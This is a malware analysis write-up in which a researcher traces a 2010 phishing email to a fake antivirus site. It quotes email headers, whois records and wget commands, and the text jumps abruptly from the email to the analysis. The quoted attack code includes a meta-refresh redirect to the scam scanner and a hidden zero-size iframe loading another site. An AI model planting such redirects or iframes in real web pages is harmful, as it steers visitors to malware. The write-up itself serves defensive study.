From: Andres Pratt <firstname.lastname@example.org> Subject: Vacation Care Payment Program - September 2010 Date: September 20, 2010 3:55:08 PM GMT+02:00 To: mymailinglist-owner@lists.YYYYYY.org Return-Path: <mailman-bounces@lists.YYYYYY.org> X-Original-To: aaron@XXXXXX.org Delivered-To: aaron@XXXXXX.org X-Policyd-Weight: using cached result; rate:hard: -7.6 Received: from abc.YYYYYY.org (abc.YYYYYY.org [18.104.22.168]) by mailserver.XXXXXX.org (Postfix) with ESMTP id 919B6CE21B0 for <aaron@XXXXXX.org>; Mon, 20 Sep 2010 14:55:19 +0200 (CEST) Received: from localhost ([127.0.0.1] helo=abc.YYYYYY.org) by abc.YYYYYY.org with esmtp (Exim 4.63) (envelope-from <mailman-bounces@lists.YYYYYY.org>) id 1Oxftv-000581-5y; Mon, 20 Sep 2010 14:55:19 +0200 Received: from [22.214.171.124] (helo=LOSHAZXPVC) by abc.YYYYYY.org with esmtp (Exim 4.63) (envelope-from <email@example.com>) id 1Oxftq-00057e-Ki; Mon, 20 Sep 2010 14:55:17 +0200 Received: from mta003.royalhighgate.com (mta298.royalhighgate.com [126.96.36.199]) by mail.royalhighgate.com (8.13.2+Sun/8.13.9) with ESMTP id 36ij9391558267 for <mymailinglist-owner@lists.YYYYYY.org>; Mon, 20 Sep 2010 15:55:08 +0200 Message-Id: <41060351.52314783258024343.JavaMail.firstname.lastname@example.org> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_Part_8807_43917428.1091380632604" X-Spam-Checker-Version: SpamAssassin 3.1.7-deb3 (2006-10-05) on abc.YYYYYY.org X-Spam-Level: ** X-Spam-Status: No, score=2.9 required=5.0 tests=BAYES_50,HTML_MESSAGE, RCVD_IN_BSP_OTHER,RCVD_IN_PBL,RCVD_IN_SORBS_WEB autolearn=no version=3.1.7-deb3 Sender: mailman-bounces@lists.YYYYYY.org Errors-To: mailman-bounces@lists.YYYYYY.org X-Sa-Exim-Connect-Ip: 127.0.0.1 X-Sa-Exim-Mail-From: mailman-bounces@lists.YYYYYY.org X-Sa-Exim-Scanned: No (on abc.YYYYYY.org); SAEximRunCond expanded to false<pre>HI All,</pre> <pre>Attached is the program and payments program for the upcoming vacation care. As I will be absent over this time I trying to ensure all is well organized for the team. Could you please confirm how you wish to pay for the events as listed.</pre>
Pic1: document.write(t7ah);t7ah="";So we now know that the variable t7ah would be written to the web browser (the DOM tree). The next question is, what ist he value of the t7ah variable? Again, the same trick works! The second alert() does the trick.Another alert(t7ah); shows its contents:
PLEASE WAITING.... 4 SECONDS <meta http-equiv="refresh" content="4;url=http://scaner-high.cz.cc/scanner10/?afid=24" /> <iframe width="0" height="0" src="http://finwizonline.com/news/"></iframe>Obviously the attackers will redirect us again to two new URLs. So we can now take a look at these two domains:
$ host scaner-high.cz.cc scaner-high.cz.cc has address 188.8.131.52
$ whois 184.108.40.206 # % Information related to '220.127.116.11 - 18.104.22.168'
inetnum: 22.214.171.124 - 126.96.36.199 netname: net-0x2a descr: Zharkov Mukola Mukolayovuch remarks: Datacentre "0x2a" country: UA org: ORG-PEZM1-RIPE admin-c: ZN210-RIPE tech-c: ZN210-RIPE status: ASSIGNED PI mnt-by: RIPE-NCC-HM-PI-MNT mnt-lower: RIPE-NCC-HM-PI-MNT mnt-by: ONIK-MNT mnt-routes: ONIK-MNT mnt-domains: ONIK-MNT source: RIPE # Filtered
organisation: ORG-PEZM1-RIPE org-name: Private Entreprise Zharkov Mukola Mukolayovuch org-type: OTHER address: Ukraine, Kyiv, Entuziastov str. 29, of. 42 e-mail: email@example.com admin-c: ZN210-RIPE phone: +38-044 587-83-16 mnt-ref: ONIK-MNT mnt-by: ONIK-MNT source: RIPE # Filtered
person: Zharkov Nikolay address: Ukraine, Kyiv, Entuziastov str. 29, of. 42 phone: +38-044 587-83-16 nic-hdl: ZN210-RIPE mnt-by: ONIK-MNT source: RIPE # Filtered
% Information related to '188.8.131.52/22AS48587'Looks suspicious!But for the sake of completeness, let's also first get the iframe from above:
$ host finwizonline.com finwizonline.com has address 184.108.40.206 (comcast) finwizonline.com has address 220.127.116.11 (comcast) finwizonline.com has address 18.104.22.168 (AT&T PPP Pool) finwizonline.com has address 22.214.171.124 (comcast Boston) finwizonline.com has address 126.96.36.199 (comcast)The author could not get any data from the finwizonline.com/news iframe regardless of which useragent string (IE 6.0 for example) was chosen. Possibly the website was taken down already.So let us go back to the scaner-high.cz.cc URL:
$ wget -U "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)" \ "http://scaner-high.cz.cc/scanner10/?afid=24"This shows us a nice fake Antivirus screen!
$ more index.html\?afid\=24 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Language" content="en" /> <meta http-equiv="Cache-control" content="Public" />
<title>My Windows Online Scanner</title> <link rel="icon" href="/assets/5b9c863d//Images/favicon.gif" type="image/gif" />
http://www.virustotal.com/file-scan/report.html?id=de7262bf81a9d791d80986f785c795edf02ac0ba7c39cd89fb9021f8a6228e5f-1284989236Shows that this is a rather well known piece of malware. It is well detected. 65% of all AV engines detect this fake AV at the time of this writing.The next step of course would be to reverse engineer this malware but - I leave it as it is right now. Nothing really new.So far the author only managed to download the binary .EXE file if the user agent string matches as shown above.The Webserver serving the malware runs on nginx/0.7.65 As said above, we had to fake the User Agent string to "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)". A very practical tool to fake UA strings is "UserAgent Switcher" for Firefox. This way the author could download the samples from a regular Linux PC.Fake AV User Experience
Pic 3: a pop-up box appears and warns the user that his computer is "infected". Please note that this screenshot was of course done on e Linux System as to not infect the host.If the user clicks OK here, then he is redirected to this page, which looks like a Windows window alerting him of malware:Pic 4: a web page looking like a regular Windows Window. Non computer savvy people would fall for this trick.Finally if the user clicks on "remove all" he will receive a .EXE file called "antivirus.exe" which is the very same binary that we were able to download via wget before.Author: L. Aaron Kaplan